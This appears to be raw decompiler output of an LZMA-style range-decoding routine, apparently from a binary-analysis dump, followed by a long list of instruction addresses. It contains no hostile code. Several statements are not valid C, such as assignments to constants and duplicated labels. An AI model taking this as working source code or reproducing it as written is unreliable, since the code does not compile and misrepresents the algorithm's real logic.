											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00407390
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x0040697f
                                                                                                                                                                                                  0x00000000
